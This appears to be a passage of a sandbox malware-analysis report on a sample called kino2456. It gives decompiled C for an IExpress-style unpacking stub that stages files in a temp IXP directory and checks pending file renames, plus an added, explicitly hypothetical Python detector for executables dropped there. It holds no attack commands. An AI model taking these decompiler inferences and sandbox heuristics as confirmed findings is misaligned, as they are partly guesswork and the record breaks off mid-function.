• CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00965434
• CreateDirectoryA.KERNELBASE(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00965452
Strings
Memory Dump Source
• Source File: 00000002.00000002.430454699.0000000000961000.00000020.00000001.01000000.00000005.sdmp, Offset: 00960000, based on PE: true
• Associated: 00000002.00000002.430432662.0000000000960000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430498862.0000000000968000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430508939.000000000096A000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430508939.000000000096C000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_960000_kino2456.jbxd
Similarity
• API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
• String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$IXP$IXP%03d.TMP
• API String ID: 1082909758-3361814588
• Opcode ID: cea05401533496fc4c03fcd0536c00d84ee093a0eb23173f1cbb12993ce96eb1
• Instruction ID: 7fd5a212ebb31bc91cb5cabceea17e3555d61c517f19468c8594b65c656ad2fe
• Opcode Fuzzy Hash: cea05401533496fc4c03fcd0536c00d84ee093a0eb23173f1cbb12993ce96eb1
• Instruction Fuzzy Hash: 6B11237130851477D7209B369C49FEF366DEFC2711F040169F646E22A0CEB48D829AA2
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 478 965467-965484 479 96551c-965528 call 961680 478->479 480 96548a-965490 call 9653a1 478->480 483 96552d-965539 call 9658c8 479->483 484 965495-965497 480->484 493 96554d-965552 483->493 494 96553b-965545 CreateDirectoryA 483->494 485 965581-965583 484->485 486 96549d-9654c0 call 961781 484->486 488 96558d-96559d call 966ce0 485->488 495 9654c2-9654d8 GetSystemInfo 486->495 496 96550c-96551a call 96658a 486->496 500 965554-965557 call 96597d 493->500 501 965585-96558b 493->501 498 965577-96557c call 966285 494->498 499 965547 494->499 502 9654fe 495->502 503 9654da-9654dd 495->503 496->483 498->485 499->493 509 96555c-96555e 500->509 501->488 510 965503-965507 call 96658a 502->510 507 9654f7-9654fc 503->507 508 9654df-9654e2 503->508 507->510 513 9654e4-9654e7 508->513 514 9654f0-9654f5 508->514 509->501 515 965560-965566 509->515 510->496 513->496 517 9654e9-9654ee 513->517 514->510 515->485 518 965568-965575 RemoveDirectoryA 515->518 517->510 518->485
C-Code - Quality: 75%
E00965467(CHAR* __ecx, void* __edx, char* _a4) {
	signed int _v8;
	char _v268;
	struct _SYSTEM_INFO _v304;
	void* __ebx;
	void* __edi;
	void* __esi;
	signed int _t10;
	void* _t13;
	intOrPtr _t14;
	void* _t16;
	void* _t20;
	signed int _t26;
	void* _t28;
	void* _t29;
	CHAR* _t48;
	signed int _t49;
	intOrPtr _t61;

	// Stack-cookie prologue: the global security cookie is XORed with the frame
	// register and stored in _v8; E00966CE0 (the epilogue) re-checks it on return.
	_t10 =  *0x968004; // 0xf4cc89a0
	_v8 = _t10 ^ _t49;
	_push(__ecx);
	if(__edx == 0) {
		// No caller-supplied path: use the default directory buffer at 0x9691e4 (MAX_PATH = 0x104).
		_t48 = 0x9691e4;
		_t42 = 0x104;
		E00961680(0x9691e4, 0x104);
		L14:
		_t13 = E009658C8(_t48); // executed
		if(_t13 != 0) {
			L17:
			_t42 = _a4;
			if(_a4 == 0) {
				L23:
				 *0x969124 = 0;
				_t14 = 1;
				L24:
				return E00966CE0(_t14, 0, _v8 ^ _t49, _t42, 1, _t48);
			}
			_t16 = E0096597D(_t48, _t42, 1, 0); // executed
			if(_t16 != 0) {
				goto L23;
			}
			// On failure, remove the directory again only if this function created it
			// (flag at 0x968a20 set below).
			_t61 =  *0x968a20; // 0x0
			if(_t61 != 0) {
				 *0x968a20 = 0;
				RemoveDirectoryA(_t48);
			}
			L22:
			_t14 = 0;
			goto L24;
		}
		// Working directory does not exist yet: create it; on failure store an error
		// code returned by E00966285 (likely a GetLastError wrapper) at 0x969124.
		if(CreateDirectoryA(_t48, 0) == 0) {
			 *0x969124 = E00966285();
			goto L22;
		}
		 *0x968a20 = 1; // remember that we created the directory
		goto L17;
	}
	// Caller supplied a path: expand it into the local buffer _v268 first.
	_t42 =  &_v268;
	_t20 = E009653A1(__ecx,  &_v268); // executed
	if(_t20 == 0) {
		goto L22;
	}
	_push(__ecx);
	_t48 = 0x9691e4;
	E00961781(0x9691e4, 0x104, __ecx,  &_v268);
	if(( *0x969a34 & 0x00000020) == 0) {
		L12:
		_t42 = 0x104;
		E0096658A(_t48, 0x104, 0x961140);
		goto L14;
	}
	// Flag 0x20 set: append an architecture-specific suffix to the path. The low word
	// of dwOemId is wProcessorArchitecture; 0 is PROCESSOR_ARCHITECTURE_INTEL ("i386").
	GetSystemInfo( &_v304);
	_t26 = _v304.dwOemId & 0x0000ffff;
	if(_t26 == 0) {
		_push("i386");
		L11:
		E0096658A(_t48, 0x104);
		goto L12;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t28 = _t26 - 1;
                                                                                                                                                                                                                                    				if(_t28 == 0) {
                                                                                                                                                                                                                                    					_push("mips");
                                                                                                                                                                                                                                    					goto L11;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t29 = _t28 - 1;
                                                                                                                                                                                                                                    				if(_t29 == 0) {
                                                                                                                                                                                                                                    					_push("alpha");
                                                                                                                                                                                                                                    					goto L11;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				if(_t29 != 1) {
                                                                                                                                                                                                                                    					goto L12;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_push("ppc");
                                                                                                                                                                                                                                    				goto L11;
                                                                                                                                                                                                                                    			}




















Address column of the listing (one entry per decompiled line of the function, in listing order; 0x00000000 entries have no mapped instruction):
0x00965472 0x00965479 0x00965481 0x00965484 0x0096551c 0x00965521 0x00965528 0x0096552d
0x0096552f 0x00965539 0x0096554d 0x0096554d 0x00965552 0x00965585 0x00965585 0x0096558b
0x0096558d 0x0096559d 0x0096559d 0x00965557 0x0096555e 0x00000000 0x00000000 0x00965560
0x00965566 0x00965569 0x0096556f 0x0096556f 0x00965581 0x00965581 0x00000000 0x00965581
0x00965545 0x0096557c 0x00000000 0x0096557c 0x00965547 0x00000000 0x00965547 0x0096548a
0x00965490 0x00965497 0x00000000 0x00000000 0x0096549d 0x009654ab 0x009654b4 0x009654c0
0x0096550c 0x00965511 0x00965515 0x00000000 0x00965515 0x009654c9 0x009654d6 0x009654d8
0x009654fe 0x00965503 0x00965507 0x00000000 0x00965507 0x009654da 0x009654dd 0x009654f7
0x00000000 0x009654f7 0x009654df 0x009654e2 0x009654f0 0x00000000 0x009654f0 0x009654e7
0x00000000 0x00000000 0x009654e9 0x00000000

APIs
• GetSystemInfo.KERNEL32(?,?,?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 009654C9
• CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 0096553D
• RemoveDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 0096556F
  • Part of subcall function 009653A1: RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 009653FB
  • Part of subcall function 009653A1: GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00965402
  • Part of subcall function 009653A1: GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP002.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 0096541F
  • Part of subcall function 009653A1: DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 0096542B
  • Part of subcall function 009653A1: CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00965434
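The listing and API list above show the staging routine of the unpacking stub: it reads the low word of SYSTEM_INFO.dwOemId (which overlays wProcessorArchitecture, so the 0/1/2/3 cases are the Intel, MIPS, Alpha and PPC constants) and works in a %TEMP%\IXPnnn.TMP directory, here C:\Users\user\AppData\Local\Temp\IXP002.TMP\, obtained through GetTempFileNameA with the "IXP" prefix followed by DeleteFileA and CreateDirectoryA, and torn down again with RemoveDirectoryA. The "IXP" prefix and IXPnnn.TMP naming are the pattern of Microsoft's IExpress self-extractor stub (wextract), which the report itself does not name; legitimate IExpress packages create the same directories, so the directory alone is weak evidence. The following detector is an added example, not code from the report, Joe Sandbox or the sample: it runs over constructed, simplified file-system audit records (not real Sysmon or EDR output) and raises a high-severity finding only when the same process that used an IXPnnn.TMP directory also writes executable content into it. The record format, process names and dropped file names are all assumptions made for the example.

```python
import re
from dataclasses import dataclass, field
from typing import Iterable, List

# Hypothetical detector (added example; not the report's, the sandbox's or the
# sample's code). Input records are "<op>|<process image>|<path>" with op in
# {mkdir, create}; this format and every record below are constructed for the
# example and are not real Sysmon/EDR telemetry.

# %TEMP%\IXPnnn.TMP, the directory the listing builds via
# GetTempFileNameA("IXP") + DeleteFileA + CreateDirectoryA.
IXP_DIR_RE = re.compile(r"\\Temp\\(IXP\d{3}\.TMP)(?:\\|$)", re.IGNORECASE)
EXEC_EXT_RE = re.compile(r"\.(?:exe|dll|scr|com|cmd|bat|ps1|vbs|js)$", re.IGNORECASE)

# Constructed sample records (assumed names; not from the report).
SAMPLE_RECORDS = [
    r"mkdir|C:\Users\user\Desktop\dropper.exe|C:\Users\user\AppData\Local\Temp\IXP002.TMP",
    r"create|C:\Users\user\Desktop\dropper.exe|C:\Users\user\AppData\Local\Temp\IXP002.TMP\payload.exe",
    r"create|C:\Users\user\Desktop\dropper.exe|C:\Users\user\AppData\Local\Temp\IXP002.TMP\loader.dll",
    r"create|C:\Windows\System32\svchost.exe|C:\Users\user\AppData\Local\Temp\log.txt",
    r"mkdir|C:\Program Files\Vendor\setup.exe|C:\Users\user\AppData\Local\Temp\IXP000.TMP",
    r"create|C:\Program Files\Vendor\setup.exe|C:\Users\user\AppData\Local\Temp\IXP000.TMP\readme.txt",
]


@dataclass
class Finding:
    process: str
    staging_dir: str
    dropped_executables: List[str] = field(default_factory=list)

    @property
    def severity(self) -> str:
        # The directory alone is weak evidence: benign IExpress packages create
        # the same IXPnnn.TMP directories. Executables dropped into it by the
        # same process are the stronger signal.
        return "high" if self.dropped_executables else "low"


def parse_record(line: str):
    op, process, path = line.split("|", 2)
    return op.strip(), process.strip(), path.strip()


def detect_ixp_staging(records: Iterable[str]) -> List[Finding]:
    findings = {}  # (process, staging dir) -> Finding, in first-seen order
    for line in records:
        if not line.strip():
            continue
        op, process, path = parse_record(line)
        m = IXP_DIR_RE.search(path)
        if m is None:
            continue  # not under an IXPnnn.TMP directory
        staging_dir = m.group(1).upper()
        key = (process.lower(), staging_dir)
        finding = findings.setdefault(key, Finding(process, staging_dir))
        if op == "create" and EXEC_EXT_RE.search(path):
            finding.dropped_executables.append(path)
    return list(findings.values())


if __name__ == "__main__":
    for f in detect_ixp_staging(SAMPLE_RECORDS):
        print(f"[{f.severity}] {f.process} -> {f.staging_dir}: {f.dropped_executables}")
```

On the constructed records the dropper yields one high-severity finding for IXP002.TMP with two dropped executables, while the installer that only writes a text file into IXP000.TMP stays at low severity; a real deployment would key on process GUIDs rather than image paths and add the child-process execution from the staging directory as a further signal.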
Strings
Memory Dump Source
• Source File: 00000002.00000002.430454699.0000000000961000.00000020.00000001.01000000.00000005.sdmp, Offset: 00960000, based on PE: true
• Associated: 00000002.00000002.430432662.0000000000960000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430498862.0000000000968000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430508939.000000000096A000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430508939.000000000096C000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_960000_kino2456.jbxd
Similarity
• API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
• String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$alpha$i386$mips$ppc
• API String ID: 1979080616-510557316
• Opcode ID: b63e6cab18e384ccff07d9a1c8c25ee5f2ef7e3cd7200d5910b83c0790da65cd
• Instruction ID: 3098ed641d3c33609e861e6b570df7eaa8981bb97253c29ea10449af31729b79
• Opcode Fuzzy Hash: b63e6cab18e384ccff07d9a1c8c25ee5f2ef7e3cd7200d5910b83c0790da65cd
• Instruction Fuzzy Hash: 9D312770B18A105BCB109B299C49A7F779EABC2344F1A012EF803D3650DFB4CE419A91
Uniqueness
• Uniqueness Score: -1.00%
Control-flow Graph
• Graph not reproduced in this text (legend: Executed / Not Executed)
                                                                                                                                                                                                                                    control_flow_graph 519 96256d-96257d 520 962622-962627 call 9624e0 519->520 521 962583-962589 519->521 526 962629-96262f 520->526 522 96258b 521->522 523 9625e8-962607 RegOpenKeyExA 521->523 525 962591-962595 522->525 522->526 527 9625e3-9625e6 523->527 528 962609-962620 RegQueryInfoKeyA 523->528 525->526 530 96259b-9625ba RegOpenKeyExA 525->530 527->526 531 9625d1-9625dd RegCloseKey 528->531 530->527 532 9625bc-9625cb RegQueryValueExA 530->532 531->527 532->531
                                                                                                                                                                                                                                    C-Code - Quality: 86%
                                                                                                                                                                                                                                    			E0096256D(signed int __ecx) {
                                                                                                                                                                                                                                    				int _v8;
                                                                                                                                                                                                                                    				void* _v12;
                                                                                                                                                                                                                                    				signed int _t13;
                                                                                                                                                                                                                                    				signed int _t19;
                                                                                                                                                                                                                                    				long _t24;
                                                                                                                                                                                                                                    				void* _t26;
                                                                                                                                                                                                                                    				int _t31;
                                                                                                                                                                                                                                    				void* _t34;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_push(__ecx);
                                                                                                                                                                                                                                    				_push(__ecx);
                                                                                                                                                                                                                                    				_t13 = __ecx & 0x0000ffff;
                                                                                                                                                                                                                                    				_t31 = 0;
                                                                                                                                                                                                                                    				if(_t13 == 0) {
                                                                                                                                                                                                                                    					_t31 = E009624E0(_t26);
                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                    					_t34 = _t13 - 1;
                                                                                                                                                                                                                                    					if(_t34 == 0) {
                                                                                                                                                                                                                                    						_v8 = 0;
                                                                                                                                                                                                                                    						if(RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager\\FileRenameOperations", 0, 0x20019,  &_v12) != 0) {
                                                                                                                                                                                                                                    							goto L7;
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							_t19 = RegQueryInfoKeyA(_v12, 0, 0, 0, 0, 0, 0,  &_v8, 0, 0, 0, 0);
                                                                                                                                                                                                                                    							goto L6;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						L12:
                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                    						if(_t34 > 0 && __ecx <= 3) {
                                                                                                                                                                                                                                    							_v8 = 0;
                                                                                                                                                                                                                                    							_t24 = RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager", 0, 0x20019,  &_v12); // executed
                                                                                                                                                                                                                                    							if(_t24 == 0) {
                                                                                                                                                                                                                                    								_t19 = RegQueryValueExA(_v12, "PendingFileRenameOperations", 0, 0, 0,  &_v8); // executed
                                                                                                                                                                                                                                    								L6:
                                                                                                                                                                                                                                    								asm("sbb eax, eax");
                                                                                                                                                                                                                                    								_v8 = _v8 &  !( ~_t19);
                                                                                                                                                                                                                                    								RegCloseKey(_v12); // executed
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							L7:
                                                                                                                                                                                                                                    							_t31 = _v8;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				return _t31;
                                                                                                                                                                                                                                    				goto L12;
                                                                                                                                                                                                                                    			}
                                                                                                                                                                                                                                    0x00962572
                                                                                                                                                                                                                                    0x00962573
                                                                                                                                                                                                                                    0x00962575
                                                                                                                                                                                                                                    0x00962578
                                                                                                                                                                                                                                    0x0096257d
                                                                                                                                                                                                                                    0x00962627
                                                                                                                                                                                                                                    0x00962583
                                                                                                                                                                                                                                    0x00962586
                                                                                                                                                                                                                                    0x00962589
                                                                                                                                                                                                                                    0x009625eb
                                                                                                                                                                                                                                    0x00962607
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00962609
                                                                                                                                                                                                                                    0x0096261a
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0096261a
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0096258b
                                                                                                                                                                                                                                    0x0096258b
                                                                                                                                                                                                                                    0x0096259e
                                                                                                                                                                                                                                    0x009625b2
                                                                                                                                                                                                                                    0x009625ba
                                                                                                                                                                                                                                    0x009625cb
                                                                                                                                                                                                                                    0x009625d1
                                                                                                                                                                                                                                    0x009625d6
                                                                                                                                                                                                                                    0x009625da
                                                                                                                                                                                                                                    0x009625dd
                                                                                                                                                                                                                                    0x009625dd
                                                                                                                                                                                                                                    0x009625e3
                                                                                                                                                                                                                                    0x009625e3
                                                                                                                                                                                                                                    0x009625e3
                                                                                                                                                                                                                                    0x0096258b
                                                                                                                                                                                                                                    0x00962589
                                                                                                                                                                                                                                    0x0096262f
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Control\Session Manager,00000000,00020019,?,00000000,00964096,00964096,?,00961ED3,00000001,00000000,?,?,00964137,?), ref: 009625B2
                                                                                                                                                                                                                                    • RegQueryValueExA.KERNELBASE(?,PendingFileRenameOperations,00000000,00000000,00000000,00964096,?,00961ED3,00000001,00000000,?,?,00964137,?,00964096), ref: 009625CB
                                                                                                                                                                                                                                    • RegCloseKey.KERNELBASE(?,?,00961ED3,00000001,00000000,?,?,00964137,?,00964096), ref: 009625DD
                                                                                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Session Manager\FileRenameOperations,00000000,00020019,?,00000000,00964096,00964096,?,00961ED3,00000001,00000000,?,?,00964137,?), ref: 009625FF
                                                                                                                                                                                                                                    • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,00964096,00000000,00000000,00000000,00000000,?,00961ED3,00000001,00000000), ref: 0096261A
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    • System\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 009625F5
                                                                                                                                                                                                                                    • System\CurrentControlSet\Control\Session Manager, xrefs: 009625A8
                                                                                                                                                                                                                                    • PendingFileRenameOperations, xrefs: 009625C3
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.430454699.0000000000961000.00000020.00000001.01000000.00000005.sdmp, Offset: 00960000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430432662.0000000000960000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430498862.0000000000968000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_960000_kino2456.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: OpenQuery$CloseInfoValue
                                                                                                                                                                                                                                    • String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
                                                                                                                                                                                                                                    • API String ID: 2209512893-559176071
                                                                                                                                                                                                                                    • Opcode ID: e6044271a5daa9660a0d3f2511c5ab0b66ca2a7a1aa8154b92bedd0387c3a2d3
                                                                                                                                                                                                                                    • Instruction ID: 22fa6abd1dc0d666b2a4699c1fc222f04c0a27255c3c3f997ea84666911f1c8f
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e6044271a5daa9660a0d3f2511c5ab0b66ca2a7a1aa8154b92bedd0387c3a2d3
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 09118C35956228BB9B209B92DC09DFBBE7CEF427A5F504156F809F2010DA705E44FAA1
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

Control-flow Graph

(control-flow graph for the function at 0x966a60 omitted; rendered graph with Executed / Not Executed legend not reproduced in text)
C-Code - Quality: 51%
_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
	signed int* _t25;
	signed int _t26;
	signed int _t29;
	int _t30;
	signed int _t37;
	signed char _t41;
	signed int _t53;
	signed int _t54;
	intOrPtr _t56;
	signed int _t58;
	signed int _t59;
	intOrPtr* _t60;
	void* _t62;
	void* _t67;
	void* _t68;

	E00967155();
	_push(0x58);
	_push(0x9672b8);
	E00967208(__ebx, __edi, __esi);
	 *(_t62 - 0x20) = 0;
	GetStartupInfoW(_t62 - 0x68);
	 *((intOrPtr*)(_t62 - 4)) = 0;
	_t56 =  *((intOrPtr*)( *[fs:0x18] + 4));
	_t53 = 0;
	while(1) {
		asm("lock cmpxchg [edx], ecx");
		if(0 == 0) {
			break;
		}
		if(0 != _t56) {
			Sleep(0x3e8);
			continue;
		} else {
			_t58 = 1;
			_t53 = 1;
		}
		L7:
		_t67 =  *0x9688b0 - _t58; // 0x2
		if(_t67 != 0) {
			__eflags =  *0x9688b0; // 0x2
			if(__eflags != 0) {
				 *0x9681e4 = _t58;
				goto L13;
			} else {
				 *0x9688b0 = _t58;
				_t37 = E00966C3F(0x9610b8, 0x9610c4); // executed
				__eflags = _t37;
				if(__eflags == 0) {
					goto L13;
				} else {
					 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
					_t30 = 0xff;
				}
			}
		} else {
			_push(0x1f);
			L00966FF4();
			L13:
			_t68 =  *0x9688b0 - _t58; // 0x2
			if(_t68 == 0) {
				_push(0x9610b4);
				_push(0x9610ac);
				L00967202();
				 *0x9688b0 = 2;
			}
			if(_t53 == 0) {
				 *0x9688ac = 0;
			}
			_t71 =  *0x9688b4;
			if( *0x9688b4 != 0 && E00967060(_t71, 0x9688b4) != 0) {
				_t60 =  *0x9688b4; // 0x0
				 *0x96a288(0, 2, 0);
				 *_t60();
			}
			_t25 = __imp___acmdln; // 0x74895b9c
			_t59 =  *_t25;
			 *(_t62 - 0x1c) = _t59;
			_t54 =  *(_t62 - 0x20);
			while(1) {
				_t41 =  *_t59;
				if(_t41 > 0x20) {
					goto L32;
				}
				if(_t41 != 0) {
					if(_t54 != 0) {
						goto L32;
					} else {
						while(_t41 != 0 && _t41 <= 0x20) {
							_t59 = _t59 + 1;
							 *(_t62 - 0x1c) = _t59;
							_t41 =  *_t59;
						}
					}
				}
				__eflags =  *(_t62 - 0x3c) & 0x00000001;
				if(( *(_t62 - 0x3c) & 0x00000001) == 0) {
					_t29 = 0xa;
				} else {
					_t29 =  *(_t62 - 0x38) & 0x0000ffff;
				}
				_push(_t29);
				_t30 = E00962BFB(0x960000, 0, _t59); // executed
				 *0x9681e0 = _t30;
				__eflags =  *0x9681f8;
				if( *0x9681f8 == 0) {
					exit(_t30); // executed
					goto L32;
				}
				__eflags =  *0x9681e4;
				if( *0x9681e4 == 0) {
					__imp___cexit();
					_t30 =  *0x9681e0; // 0x0
				}
				 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
				goto L40;
				L32:
				__eflags = _t41 - 0x22;
				if(_t41 == 0x22) {
					__eflags = _t54;
					_t15 = _t54 == 0;
					__eflags = _t15;
					_t54 = 0 | _t15;
					 *(_t62 - 0x20) = _t54;
				}
                                                                                                                                                                                                                                    							_t26 = _t41 & 0x000000ff;
                                                                                                                                                                                                                                    							__imp___ismbblead(_t26);
                                                                                                                                                                                                                                    							__eflags = _t26;
                                                                                                                                                                                                                                    							if(_t26 != 0) {
                                                                                                                                                                                                                                    								_t59 = _t59 + 1;
                                                                                                                                                                                                                                    								__eflags = _t59;
                                                                                                                                                                                                                                    								 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							_t59 = _t59 + 1;
                                                                                                                                                                                                                                    							 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					L40:
                                                                                                                                                                                                                                    					return E0096724D(_t30);
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t58 = 1;
                                                                                                                                                                                                                                    				__eflags = 1;
                                                                                                                                                                                                                                    				goto L7;
                                                                                                                                                                                                                                    			}

                                                                                                                                                                                                                                    0x00966be6
                                                                                                                                                                                                                                    0x00966be6
                                                                                                                                                                                                                                    0x00966be9
                                                                                                                                                                                                                                    0x00966bea
                                                                                                                                                                                                                                    0x00966bea
                                                                                                                                                                                                                                    0x00966b74
                                                                                                                                                                                                                                    0x00966c39
                                                                                                                                                                                                                                    0x00966c3e
                                                                                                                                                                                                                                    0x00966c3e
                                                                                                                                                                                                                                    0x00966abe
                                                                                                                                                                                                                                    0x00966abe
                                                                                                                                                                                                                                    0x00000000

APIs
  • Part of subcall function 00967155: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00967182
  • Part of subcall function 00967155: GetCurrentProcessId.KERNEL32 ref: 00967191
  • Part of subcall function 00967155: GetCurrentThreadId.KERNEL32 ref: 0096719A
  • Part of subcall function 00967155: GetTickCount.KERNEL32 ref: 009671A3
  • Part of subcall function 00967155: QueryPerformanceCounter.KERNEL32(?), ref: 009671B8
• GetStartupInfoW.KERNEL32(?,009672B8,00000058), ref: 00966A7F
• Sleep.KERNEL32(000003E8), ref: 00966AB4
• _amsg_exit.MSVCRT ref: 00966AC9
• _initterm.MSVCRT ref: 00966B1D
• __IsNonwritableInCurrentImage.LIBCMT ref: 00966B49
• exit.KERNELBASE ref: 00966BBF
• _ismbblead.MSVCRT ref: 00966BDA
Memory Dump Source
• Source File: 00000002.00000002.430454699.0000000000961000.00000020.00000001.01000000.00000005.sdmp, Offset: 00960000, based on PE: true
• Associated: 00000002.00000002.430432662.0000000000960000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430498862.0000000000968000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430508939.000000000096A000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430508939.000000000096C000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_960000_kino2456.jbxd
Similarity
• API ID: Current$Time$CountCounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThreadTick_amsg_exit_initterm_ismbbleadexit
• String ID:
• API String ID: 836923961-0
• Opcode ID: f7af2f3b8b96dd6e609bde5f099c7b299fbac493d3b9355adc81a1ca50179d7f
• Instruction ID: 66ef24cd8b186e52b15c3c60c1ffb0dfd40e9731bf7de93964ced650478e8ee3
• Opcode Fuzzy Hash: f7af2f3b8b96dd6e609bde5f099c7b299fbac493d3b9355adc81a1ca50179d7f
• Instruction Fuzzy Hash: 7F41EF3095C325DFDB219FB8DD1576A7BE8EB85764F64021EE861E3290CFB488419B80
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph (rendered graph for function 9658c8 omitted; legend: Executed / Not Executed)
C-Code - Quality: 95%
			E009658C8(intOrPtr* __ecx) {
				void* _v8;
				intOrPtr _t6;
				void* _t10;
				void* _t12;
				void* _t14;
				signed char _t16;
				void* _t20;
				void* _t23;
				intOrPtr* _t27;
				CHAR* _t33;
				intOrPtr _t36; // buffer size; used below but left undeclared in the raw decompiler output

				// __ecx points at a NUL-terminated ANSI directory path
				_push(__ecx);
				_t33 = __ecx;
				_t27 = __ecx;
				_t23 = __ecx + 1;
				do { // inline strlen: advance until the terminating NUL
					_t6 =  *_t27;
					_t27 = _t27 + 1;
				} while (_t6 != 0);
				_t36 = _t27 - _t23 + 0x14; // path length plus 0x14 bytes of slack for the file name
				_t20 = LocalAlloc(0x40, _t27 - _t23 + 0x14); // 0x40 = LPTR (fixed, zero-initialised)
				if(_t20 != 0) {
					// helpers inferred from their arguments: copy the directory path, then append the probe file name
					E00961680(_t20, _t36, _t33);
					E0096658A(_t20, _t36, "TMP4351$.TMP");
					// 0x40000000 = GENERIC_WRITE, 1 = CREATE_NEW,
					// 0x4000080 = FILE_FLAG_DELETE_ON_CLOSE | FILE_ATTRIBUTE_NORMAL:
					// probes whether the directory is writable; the temp file vanishes when the handle is closed
